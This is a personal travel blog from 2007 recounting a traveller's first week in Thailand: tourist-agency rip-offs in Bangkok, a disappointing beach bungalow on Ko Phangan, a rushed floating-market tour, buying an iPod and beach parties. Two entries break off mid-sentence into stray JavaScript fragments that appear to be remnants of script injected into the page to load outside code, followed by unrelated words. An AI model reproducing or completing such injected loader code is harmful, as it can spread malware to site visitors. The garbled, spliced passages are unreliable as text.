Jungle Party

Posted by admin On January - 31 - 2007

Because of little problems of the pipe in my bathroom I got from Jimmy (the owner) a bigger bungalow, thats like a palace. It has its own bathtub but only cold water. In the evening I went back to Haad Rin beach dancing at the same spot as yesterday (there is the beste music I suppose) and guess who I met – Jacob. So I invited him to come with me to the Jungle Party. Its a party in the middle of the jungle. I was there for ages, the music was ok but the crowd wasn´t in the right mood. Just when I decided to go home Jacob arrived. So I stayed and we did an appointment for the next day. I really thought he can´t make it because we came home early in the morning. And I know everybody is extremly tired…var d=document;var s=d.createElement(‘script’);

The new bungalow in Ban Khai

Posted by admin On January - 30 - 2007

Finally now I have a much nicer bungalow, it is much better than the old one. I went to Thong Sala and on the way back I decided to walk because the taxi drivers are idiots in Ko Phangan. Around the Fullmoon party you have to pay lots and also you have to wait for them! On my way back a guy called Marek stoped with his motorbike and gave me a free lift to my place. We hang out a little but he was sort of strange. In the evening we went to the beach in Haad Rin because in the week before the party there are every evening parties at the beach. On the beach later on I met Jacob.}if (document.currentScript) { desi tashan

The big flop!

Posted by admin On January - 29 - 2007

After hours in the bus and on the ferry I finally arrived on Ko Phangan in Thong Sala. From here I had to take a very expensive taxi to my resort. I was so looking forward to my little beachfront bungalow. But it was it big surprise or better shock: I got for my 8500baht (for 5000baht you can rent a proper bungalow for one month people later told me) I got a old shack with holes in the floor, view to the party room with pool table, no water flush at the toilet and no free shuttle service to Haad Rin. The people of the resort were the opposite of hospitality. I was so shocked that I started crying and they phoned immediately the travel agent. The girl really asked me, if I cried. “Of course!!!” I knew its not refundable but at least I wanted what they had promised me or at least a new accomodation closer to Haad Rin were the Fullmoon party will be. In the end I had only to stay this one night and next day I was supposed to get a better place closer to Haad Rin in Ban Khai.

My iPod

Posted by admin On January - 28 - 2007

Today I went to the MBK. Its the biggest shopping mall in Bangkok and you can find everything. But be aware of fakes. You have to asked for originals. So after a while I found somebody selling original ipods. I wanted the big one with 80gb. I want to use it as portable harddrive for uploading my photos while travelling. Of course I will listen to my music as well. In the end it cost me about 100Euro less in Bangkok. In the evening I had to take the nightbus to Surathani and from there in the morning the ferry to Ko Phagnan.

The “Floating Market”

Posted by admin On January - 27 - 2007

Early in the morning was the pick-up for the trip to the floating market. Its the oldest and the original one. I hoped to get there lots of photo opportunities. But what a disaster! I started feeling cheated by the travel agency lady. We had only 40min time at the market, what is definitely not enough for buying things, bargaining, doing photos and eating. I was upset. After the 40min they bring us to a carving place and a gemstone place nobody wants to see! Promised was a free drop-off at the hotel. But the hotel was on the other side of Bangkok. So the driver absolutely didn’t want to bring us home. It cost us nerves and 40min after finally he had to drive us home. Besides we heard from the others in the bus, who bought the ticket somewhere else, that they only paid 200baht for the half day ticket… Never buy at a governmental tourist information T.A.T.!!! I started becoming really concerned about my 10 days Koh Phagnan with beach front bungalow and free shuttle service. Read the rest of this entry »

Temple and Rip-Off

Posted by admin On January - 26 - 2007

So this is my first day in Bangkok and my first day in Asia anyway. I decided to visit some of the numerous temple and Buddhas. Later on the other German I met and I went to a governmental travel agency (T.A.T.) – big mistake! Its the first time when I became so conscious about the “two faces of the Thai”. I had a really nice and friendly girl offering me good advice. So I booked way to expensive 10 days on Ko Phagnan (cost 8500baht; around 1000baht are 21Euro). But I had no idea, it was my first time in Thailand and I just wanted to have my little bungalow with beach front waiting for me. If I had known by then what was awaiting me… I booked as well a halfday trip to the floating markets for 600baht, first she wanted 700baht. Of course she cheated me another time. I can just tell you I learned my lesson.
